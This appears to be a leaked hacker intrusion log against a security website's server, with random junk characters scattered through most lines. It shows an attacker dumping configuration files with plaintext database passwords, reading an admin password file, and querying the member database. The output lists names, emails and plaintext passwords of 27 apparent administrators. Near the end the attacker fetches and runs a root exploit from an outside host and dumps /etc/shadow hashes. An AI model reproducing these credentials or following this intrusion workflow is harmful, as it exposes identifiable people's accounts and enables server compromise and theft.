drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
, m4 S: ^0 {1 }+ Y6 d' n4 qdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
: e! r! p- z \+ Ydrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com n0 ]8 o% ?4 ?, }2 ?
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
. A ?/ I0 s4 G$ xdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner5 t) ]) p4 P6 W$ |
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
! b0 n- R" [: c1 k. ]0 Gdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
7 q" n* |$ [4 d2 A9 q( e& |! W- [drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron! m# o3 r8 ~; @* X4 I
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
" @3 j: K7 X& |2 d% ~-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php, u7 Y: I9 E8 W$ w! a6 z
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
" I: k8 |' ^; s2 }& m/ idrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed7 F! n4 V9 S( l
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
' r& o L. f- n* Z-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess2 {# ?1 T, F- u& Y$ g4 `" ~
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
5 D- O* g% ~6 I2 f0 J, e-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
4 L/ ]. f6 O" C) ]5 m. D; U1 o( x-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
9 |+ l: K7 R1 `: U3 d$ o( t- V-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php; j K; s' M* L* S
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
8 z+ v2 b3 K$ V G( \-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf+ Z6 z5 r, s. E
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
" M, y, r5 Z) X) {, a, L! I9 Rdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
$ ~. i7 r' T) {9 v) Bdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
8 Q* M- ^/ N/ @" C+ F; Sdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log. X0 P/ Z, l' k' x8 G+ l6 s$ e( V
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
. W* ]1 e9 u, u" a, {) L& Kdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata5 y6 {7 r/ o; t
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
: V) K+ a7 @3 | B( J3 @; p-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf* r# ?+ y; _, y$ g, \* N. a' L8 F" u
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
" U$ f) j5 ~4 e& F-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt, ?. Q) |$ J4 v! T' k2 Y6 N& A5 J/ U
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss4 {- o6 y6 d2 N$ O. d% Q4 G1 Z
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
- z" d# O N5 c# @! ndrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com, G8 a$ S& u: D' Q
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
; c* }* u v% a/ c) _, x* Edrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
3 S; v" X% @: S' F2 O. Tdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl* Y9 j) T2 C/ [( ^1 g* P8 @8 W
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2. v. L- G; s; z, v; R
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old( x8 R/ s, |4 X0 _$ y# z
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php9 U8 Z2 b4 u/ K6 Y
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
$ H/ q2 d: C" U. O7 Z1 Z- H+ r/ i: A
sh-3.2$ head -20 index.php! I' G$ Z5 M* r4 g
<?PHP
! Z5 }$ a+ O, @# g; p$ q) t/**7 Z, ?# w, P* _- W& A& r$ a
* Mainfile (external) for astalavistaNET v2.03 H5 e+ m' E2 E4 {! E3 x. q
*; l& V1 l$ x' K& _& ~/ Q
* @copyright Astalavista IT Engineering GmbH/ ]9 R# l& ]& g5 k
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch> d2 t0 n6 T- G O
* @version 1.0
. ~ j- H( \" R* J*/$ u) I1 l) K; C) I, E, w
( N( `$ M* @% X# n" o" M( i+ e
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {1 N- K7 F7 `4 W7 x( J9 T+ L
$dontStartSession = false;
' w/ ?6 I+ L$ G4 o! P$ t } else {3 | O, s3 E% t0 g
$dontStartSession = true;, g {; }* n/ v
}/ S! m4 ^( p% {5 E. b" h
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);% }2 V, r" o z. ~% C4 \3 }7 w
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
6 y7 R2 q& x; E7 B% C8 Q% } require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);: ^9 L0 M3 J, |$ e5 O
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);$ j/ N$ Q0 _( ?
) M% t/ m0 Z8 \! o/ `/ v1 J
sh-3.2$ cd config- {: }- b& @! z. ]% M& o) x8 C
sh-3.2$ ls -la9 F+ B! B) v# E% {) ]
total 32
" g% B) P; G2 F# a/ ?8 S0 M* ^2 ndrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
3 d6 F/ O# h9 m2 D% r5 k- rdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..4 h7 }9 l+ c Q9 k+ u1 X
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php) L# T$ V) p9 [0 m
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
9 p+ e( Y2 A' V5 s! x1 c-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
% [2 g6 B1 ]- E- q W! ]1 i" t-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php% E5 `- U% `' f& }
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php, l9 \! W. e! x
5 s' y3 } X6 H& ]sh-3.2$ cat com.conf.php. \$ N- N1 w) w# s
[snip]3 Y4 n& C; I( { M' Z
//member-database
& h8 m. x/ t3 m. o' Y, e2 N# ~8 O$_CONFIG['db_mem_server'] = ‘localhost’;4 X# K) Z/ V- v9 d9 y8 I5 u1 t# L
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;% e( ]3 W7 L6 }: r; D! n
$_CONFIG['db_mem_user'] = ‘astanet_db’;& S. C9 v y' i$ j* B% H& e
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
$ y, L) i5 w2 Y$ o+ Q/ H1 C$_CONFIG['db_mem_debug'] = false; //true or false
" a0 |1 w, W- R$ N0 d//ads-database
+ z) a( g, X1 n0 W. h0 ?0 }# a& z$_CONFIG['db_ads_server'] = ‘localhost’;
% {3 k, ~0 }! r7 ]5 K$_CONFIG['db_ads_database'] = ‘astanet_ads’;
- p7 q1 l Q0 f9 j% [$_CONFIG['db_ads_user'] = ‘astanet_db’;
; F! D/ H! v6 Y7 E$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
3 _9 h7 K$ _+ ?" {8 b$_CONFIG['db_ads_debug'] = false; //true or false
) J0 n: [$ ~8 \//rainbow-database
- \) u e8 O9 |7 L# i I: ~$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;# _1 z! f' b* o+ O$ L/ Z
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
0 n& j3 m$ b: i; K* _. Y$_CONFIG['db_rainbow_user'] = ‘dinu’;
8 G" W+ F8 J* ]$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
: y3 i( c# G. Q5 ^$_CONFIG['db_rainbow_debug'] = false; //true or false
& X, M6 { |3 f8 @//mailing lists database/ ^; `; c6 m) B8 O' U& U* L5 X
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
9 m$ j" {8 W' D( ^# o$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;0 l7 x! Y% _4 K0 B
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
8 }9 L6 B8 G( H4 y) N- f5 r$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;7 Z& t1 ~' R6 v/ |, }
$_CONFIG['db_mailing_lists_debug'] = false; //true or false' b' A! o& x& }9 q, X2 n8 y
//paypal
8 z! H D; x z" A) \$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;! n) {1 m; L* E: r1 c0 q4 X
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
6 N8 C7 e9 b* V% `# e- T) f$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;$ r9 j: k c- x- z" }' ^' F3 z1 s! M3 L
$_CONFIG['sub_pp_noship'] = ‘1′;7 C3 j. B5 G# o$ a2 ]9 c
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;2 z2 }; S% U% H' B+ v0 S
[snip]5 {1 z, d" G# k/ h: ~0 ~# V3 w
1 Z# _ q/ z2 S& q( d, Z% bsh-3.2$ cd ..
' _8 j$ q2 ?+ @- C8 m" z0 q+ ]" Bsh-3.2$ cd member
7 y% h- Z% L. P, ^: _/ e$ M1 r* x5 H9 csh-3.2$ ls -la
5 D) Y7 o; x( B& Ttotal 20* \, d1 q7 h( K) S, c
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
: j5 }0 @. t& j* L% k j; f) r- ~drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
1 N/ t* z/ ^$ k2 P3 c-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess1 B/ ~0 D& q0 p/ j* Y7 `& J
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php6 z, ?- Z+ v/ M y& n; H
sh-3.2$ cat .htaccess
& u- o0 h- b* NSecFilterEngine off
S, ?- q9 F/ r5 a- I$ u& S$ J& X" G8 ?; N1 p4 W( `
sh-3.2$ cd ..4 v; d0 o' p( a, ~2 D, f
sh-3.2$ cd cron t% ]( D0 k4 Z9 d$ E! s
sh-3.2$ ls -la7 o- H6 @ |4 S+ z6 f
total 168
$ N8 F/ D: j4 tdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
" I# d+ i2 E- o0 Zdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..% Y G a' ?- _2 K/ k8 z
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
! F. v2 y5 o t+ S" i( S-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
. K& ?5 e6 c; C0 a4 D1 B- w' A* ~-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php" }8 y! H: [+ q+ _8 L- I6 k
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
# v) i r- z* ]( q& x( C5 {-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php. O9 j; e5 R! n
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php6 S$ p' F4 G2 _
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
: N5 n6 ]0 }7 ?% [' J0 f! J-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
4 L% V; a/ }* w$ p; {+ O-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
! d# P' I- q! G- ?( E/ D-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
7 D9 [ `. ], G2 a1 b$ Q0 w7 E-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
- o4 R4 ?4 J& O2 Z0 ?-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php1 R8 M5 @% D8 s8 h( \ X
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh( f8 I4 o6 ^; J! @5 e
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
: j# c6 O9 J2 ?* B. P-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
9 x7 C0 W3 S/ h" r-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
9 P# _6 _# ^; A0 c& y-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
~4 F' a& Z: }-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
/ `" ]0 T8 R& a+ Z* @; A) ydrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email) `3 [" P# L4 M( o) D5 F
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
. g. o @& x' _" }: Z+ g, u9 b6 Y-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php0 Z5 N `5 w( `, |2 B! E- y) x
5 ]; j9 l6 {) b8 e& X
sh-3.2$ cd ..0 t9 b$ O$ }& A5 L8 a4 o
sh-3.2$ cd _007+ h; G) v( c4 @& K2 z) @
sh-3.2$ ls -la
+ | ?; V, K+ l4 U/ A& w: D( }total 24
& ?& r2 h; Z$ ?: \% A. sdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
" o ^+ V. _1 R7 c0 hdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..+ g, Q! o/ [$ S1 G* a
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
, [& g: l' _/ r( r! J; ~: I1 F: C-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
& q3 y k: D: a9 f; l* S-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
0 s k, u6 @* d8 G; `! z7 T. }' hdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap& ?7 z) Y% n9 W$ ~
: ~+ W# P0 e9 R* u
sh-3.2$ cat .htaccess
5 c& w2 B" A$ y6 u6 N+ N- @authType Basic
( H, ^& `3 |2 r) s5 L$ GauthName Admin
! L3 f& }2 t0 j9 D( OauthUserFile /home/astanet/auth/.htadm_pwd
6 ? a! r% t/ s! p& krequire valid-user
( D; W$ w/ p6 X9 v
4 X2 `% ~% @$ ?% b: Psh-3.2$ cat /home/astanet/auth/.htadm_pwd
- z8 }/ O. v8 D. d6 k% r8 ]admin2net:CR0bl65MwhfT( b+ b& O4 R+ U8 E6 i" `. g
/ y, ~+ P+ c. w3 R
sh-3.2$ mysql -u astanet_db -p
& {* L& b# H& y$ e0 XEnter password:
' M N5 Z1 s, v9 @7 U DWelcome to the MySQL monitor. Commands end with ; or \g.- s! ~0 c, |, c# r# l
Your MySQL connection id is 2751531 Z/ k7 W4 a0 U2 m. q K
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
$ i b: f; Z- N* n( y2 |' R: r
) r. Z5 Y# @; Q7 n7 S3 s" ?; RType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 n v! J6 N6 M. T5 e
4 K) z0 T. s8 v7 _
mysql> show databases;. V4 T, |1 Q' O4 B4 Y* m( W
+———————–+
1 g' E; c7 |9 M" Q| Database |
_; F1 @) i- B- ?) n' y6 J5 t+———————–+
$ T7 K1 _2 ~* h' A J& J3 U+ T- K" N# M| information_schema |) p) o# ^( d7 }1 e7 C1 X
| astanet_ads |
3 [ T. O$ K1 y4 `+ S0 E) `4 h| astanet_mailing_lists |) I7 l( d! H! p$ w* s. s
| astanet_mediawiki |
! c/ q" P* ]* \4 }9 M1 y2 ]| astanet_membersystem |
c' E) n# ^! [3 K& r| test |
- ^) g5 L8 Y5 x6 O+———————–+! x& Z6 D& `- l' [, [- s
6 rows in set (0.00 sec)" Y F/ I8 {1 d; r% @8 q) B
9 j3 L3 z& c' \1 Dmysql> use astanet_membersystem" B; @0 z1 O" ? g' @0 z
Database changed0 X2 B" {# Q ]4 d
mysql> show tables;
y7 l& L$ G0 L" I$ h4 H2 v% e! [+———————————–+1 E, U# W! ?( {, Z% V
| Tables_in_astanet_membersystem |
! ]2 \' U" w' h* @+———————————–+
3 Z4 ?$ u# ?1 ~| blacklist_categories |
2 y T0 h+ z2 ~, k| blacklist_content |
) Q$ o; T5 y+ f0 P& e P7 a| blacklist_levels |
8 w1 N# d4 |$ C+ Z4 ~| blacklist_mcset |
' c! E; G, i, Z1 Q; {7 B% M| dir_categories |
. T: z* q! \( T5 p3 o3 K& {| dir_comments |4 V; m* R* ]+ M2 w9 e
| dir_links |: _5 k( ]9 J: ~2 ]3 m0 O. C
| dir_temp |
- {6 g" ?3 S5 C1 I| dir_votes |
" I- ~9 `* ?2 A: G| documents |
4 y! h1 w& J* y' f* Z6 N% {| documents_categories |
' F3 U- ^+ |0 M| email_content |
+ j- o2 m" q+ P| email_settings |, }3 W2 n" P2 r |" F
| exploits |% c! j' V1 G8 s& k4 Q4 k: E3 k9 q
| exploits_categories |$ j Q/ E" k9 W& h
| exploittree_categories |$ | N3 q8 N9 e6 g. b, o4 G
| exploittree_exploits |( g% C) z5 V6 J" V7 m
| home_values |
8 @/ `; h$ Q9 w9 E. i% B e| iso_countries |# Z1 W# V7 D7 u$ F% Z; n1 P5 z
| links_categories |, N2 ^& b. |; W7 }6 C% J* V
| links_records |
( F1 C W' C+ a6 o| links_unauth |: y- \* ^5 K" m: W) F
| links_votes |) P9 C7 X1 N: ]" M) L* V$ }
| log |7 x- R0 x% P4 C5 |
| news_categories |
# z9 E& n5 q! w+ ^| news_comments |! u4 U' j# z9 V( G
| news_emoticons |/ j# b' {6 @. _
| news_latest |
- ^ U9 u+ |3 B| news_messages |
6 N0 V+ ]# V& s! [" Q3 w| news_statistics |/ \$ I, u- G) ^+ n0 P( M9 z7 j
| news_votes |
: R& F9 V' G4 ]/ E' Y0 o- g| prices_content |& ~ j) A. _! R% \- U7 z8 I
| prices_offers |0 ?1 R. k0 o4 o0 y0 p; q
| rss_settings |
! \* s: B; ?$ z1 H) y8 [| sessions |! D. L. V s) k9 ^9 X a1 {
| stats_signups |' n: \- `" K/ B; B
| u2u2 |- h' q7 w5 c* z3 A9 b/ R
| u2u_contact |/ I ?& C1 p l/ I, B# b5 w
| u2u_settings |" N8 _. a* m+ o
| user_keywords_selected_categories |
* p, F4 T7 k2 F2 Q, p| users |
% e6 q7 B" i3 }, L1 P% O. `; M1 {% X| users_ipn_test |$ _; G N6 N% c
| users_keyword_values |
j# ~8 i( K$ A6 P, g: A8 `| users_profile |
6 t; O6 h1 u: V- Z. ?5 c) `! c| users_temp |0 _' ^7 V7 K; g. e
| users_upgrade |
' C; N( A! ~, \; J p$ G+ d+———————————–+/ [- |1 O+ f9 V+ G
46 rows in set (0.00 sec)
. P# V, |* Q8 Y7 k/ v$ r& e" V5 C' n$ e% E4 C$ Y, a9 C
mysql> describe users;% c2 r8 E; _2 ]8 d! P5 z
+————————–+————————————–+——+—–+———————+—————-+# t6 _3 d. Z \( ^/ F
| Field | Type | Null | Key | Default | Extra |
3 a4 \" K: w8 g4 n0 U, ^' m( l+————————–+————————————–+——+—–+———————+—————-+
' y5 H' |& A: ]4 ]( H| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment | B4 ?# u1 S1 |' r
| user | varchar(50) | NO | | | |4 o3 U3 k2 M1 q( b6 K- f
| nickname | varchar(30) | NO | MUL | anonymous | |
+ z' y4 X' o7 G# O2 I9 {| password | varchar(30) | NO | | | |
3 ?% a6 x5 m3 t" G H9 A6 p/ } B6 p5 m| userlevel | tinyint(3) | YES | MUL | NULL | |, z5 z4 ]* h+ ? e# K5 D) n* j( N
| exp | int(8) unsigned | NO | | 0 | |3 d- v8 B" r1 p& c: Y z, q4 F
| email | varchar(50) | NO | | | |3 y8 [) ^6 G2 L/ K x3 o7 n
| ip | varchar(15) | NO | | 0 | | E {7 D# ]7 z( g. Q/ K
| proxy | set(’0′,’1′) | NO | | 0 | |; x7 J( d! [0 a8 Y
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
+ G/ r4 c5 B( Z& R- n| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |% I( D" g7 a3 K, A' Y+ S ?6 `
| anz_in | tinyint(1) | NO | | -1 | |
6 ]4 g. [! y- m$ G& O+ `; q6 M| status | tinyint(1) unsigned | NO | | 0 | |/ O3 X1 m7 [3 C8 ?) u9 j
| checked | set(’0′,’1′,’2′) | NO | | 0 | |6 f' a, Y# ]; G/ V* q+ w
| freemember | set(’0′,’1′) | NO | | 0 | |# p7 p# a* G- ?& N
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
5 c6 }( x% l! u5 ?/ l5 O| lang | tinytext | NO | | | |
8 x7 a7 |- }) t+ V! y' P5 `| adid | smallint(6) | NO | | 0 | |3 \5 y( h- {7 F
| pp_txn_id | varchar(255) | YES | | NULL | |
, F) x% z9 S! n) A| cnb_transaction_id | varchar(255) | YES | | NULL | |9 Q+ b4 F3 z: e0 b# g& w
| cnb_order_id | varchar(255) | YES | | NULL | |5 b' g3 y) z% [2 f$ T% p
| cnb_user_id | int(11) | YES | | 0 | |
/ J U; K+ g6 ] N) d) B+————————–+————————————–+——+—–+———————+—————-+
8 I/ q- b6 n3 ]/ X3 a5 B. d( f22 rows in set (0.01 sec)
3 r; B a% z4 v8 o# h6 L2 I- _% Q% G0 w& k. h# v7 A& e* t' R4 o! m
mysql> select count(*) as skids from users;
6 ]5 [0 U; d% e' V; `, ^+——-+
/ ?. R q( m0 L| skids |
# @3 _* a4 O; {. k+——-+
2 Y* J/ u( U5 a, N# ~; ?# x$ h| 25199 |
7 r7 C# f- B- ?$ @! k+——-+/ R0 p- B- i; O- O4 s
1 row in set (0.00 sec)
1 {/ y- ]8 K9 b4 D
$ s% B6 X% C b `+ Dmysql> select user,nickname,password,email from users where userlevel = 1;
& N- E; O& g9 g8 z5 E6 h5 h0 w% \+————————–+———————-+——————+———————————–+2 w4 \" o" C% G7 @
| user | nickname | password | email |
. I1 ]4 q! O8 k: r7 q# P+————————–+———————-+——————+———————————–+
7 u" G- ?9 v3 Z1 W w| pascal | prozac | astaman3 | 链接标记info@astalavista.net |& P) O2 _6 E& h) A8 S3 }+ [4 s! f7 y! B
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
: s- Z5 ~9 `# Q: W( o4 e1 Y/ M F2 z| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
. L3 ]/ Z7 C" J| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
0 k( n, R# Q0 B2 d' J, w: Q| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |( z* D" l9 ~0 M* U1 Z! E" |7 u. u# S
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |* |/ H1 m3 }/ s+ H8 ^7 V4 I5 N# n
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
1 t- I& X: l% g) ?' y* `| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |' _$ g. t! a- ^1 D( z- ?1 n/ u7 o
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |7 s P! X* s0 H. D/ a1 q/ w
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
% [- h& o" _" a9 y6 W) x! q| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |( c) U: m7 \. y: R
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |; m8 B' h- z* m/ V8 W( r: r, J
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
0 W$ z) r7 R; i' `9 V| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |3 R. O0 d8 }" w2 U
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
2 g, L& J8 }+ W: w| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |) m1 a9 G: T. q9 d& o
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
! ^/ \* z2 e0 n6 F* }' p| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
) w; e3 V e7 b# D3 D: L' q| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |/ h- b/ G8 C! u! W+ r
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com | W6 K& t# t+ i% [: z
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |* E( ]. e' a9 y) ^' E
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |9 `. K( D8 s5 g- C4 v1 X
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |: h; @/ }; e: E
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |- y7 B) [7 d7 _+ P, h$ n
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
) F# Q( i& K" [# e/ }) W @* ~ ]0 f: ]| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com | g1 \& b8 e* _% w; E5 \
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
6 n4 L# p# z1 W+————————–+———————-+——————+———————————–+; V9 q. ?; P1 U# c5 d6 @
27 rows in set (0.00 sec)( b$ k: ?) t, Z! E) H
: }* j: A& @) O
mysql> exit;4 A/ P# K# k1 V2 r+ J
Bye* y) `. o1 P5 j
% R! D$ X& f/ u4 h, b
[~] plaintext passwords? yes,
7 U7 I* b, b4 |' c6 }) B& ]Those so called “security professionals” who charge you $6.66 / month to
2 m* u( p+ t7 w. D* ~register at their hack-proof portal, save your passwords in plaintext…6 `4 F7 @4 t/ }) K
brilliant!/ N: B; R; s+ g9 G+ _3 e( I9 b
& F( T: L1 v+ Y4 A+ _$ J3 V/ }% f& [[~] This been fun but we want more.
3 y: G( R# R7 F! s9 h& U! g$ c( J9 z ^
; g' ~( Y, O5 S4 ?5 x) F# k( {sh-3.2$ uname -a! ?- e2 O6 I8 Z% P' I
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux" @5 [' z4 N& l4 q
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]8 P* u& w: L5 u
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]! s* u* p! C1 y: d1 {& g6 K5 K
Resolving anti.sec.labs… 13.33.33.37
1 u& k/ R! a; D; o0 zConnecting to anti.sec.labs|13.33.33.37|:80… connected.
3 J, Y/ C( y6 _+ ~HTTP request sent, awaiting response… 200 OK2 X- D6 E! T; y8 l- q% D/ b
Length: 18200 (18K) [text/plain]
7 Z+ P7 i3 }5 d: n) hSaving to: `g0troot’
) y( J, l9 n5 t+ N3 z8 r# S
2 H7 Y. P e5 R; N100%[=========================================================================================================================================>] 18,200 58.6K/s in
2 p1 p) |3 h* D0 D+ Y5 C0.3s" J/ M. o* ?9 ]* O9 W2 _1 H
6 r v5 W0 X ]& {/ u
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200] F. s8 M0 V; ^8 R8 `: L4 n) e
% o& x* {0 Y$ g! g) j K o1 Hsh-3.2$ ./g0troot -i x86_64( r$ r) _1 `( i3 Y- ?/ v# w
[+] g0troot - anti.sec.labs& l% I$ E. ^9 Q4 X
[+] Target: 2.6.18-128.1.10.el5
2 V7 g, J& e; k1 i5 O" n[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]# c) p3 R/ p7 E! B1 P0 o4 B$ I7 A
7 v, O9 k6 i5 r$ o0 H
[+] r00tr00t @3 E$ l: [7 |* l
[~] Executing shell…
$ ]5 F! _4 F0 O; P- @- r1 d e$ u. e6 O
sh-3.2# id
, f/ @1 v! h$ Juid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)& E6 ~5 W( }- T$ m
1 w, O0 y/ h ?sh-3.2# cat /etc/shadow
7 Q3 Y; [' B+ R9 `4 lroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::4 j7 x- e. h( M
[snip]' [8 R2 j" Z# m* ]/ ~
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
, W" `, O% b& q! y& ?+ jjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::8 F0 k2 b- ^- n3 x
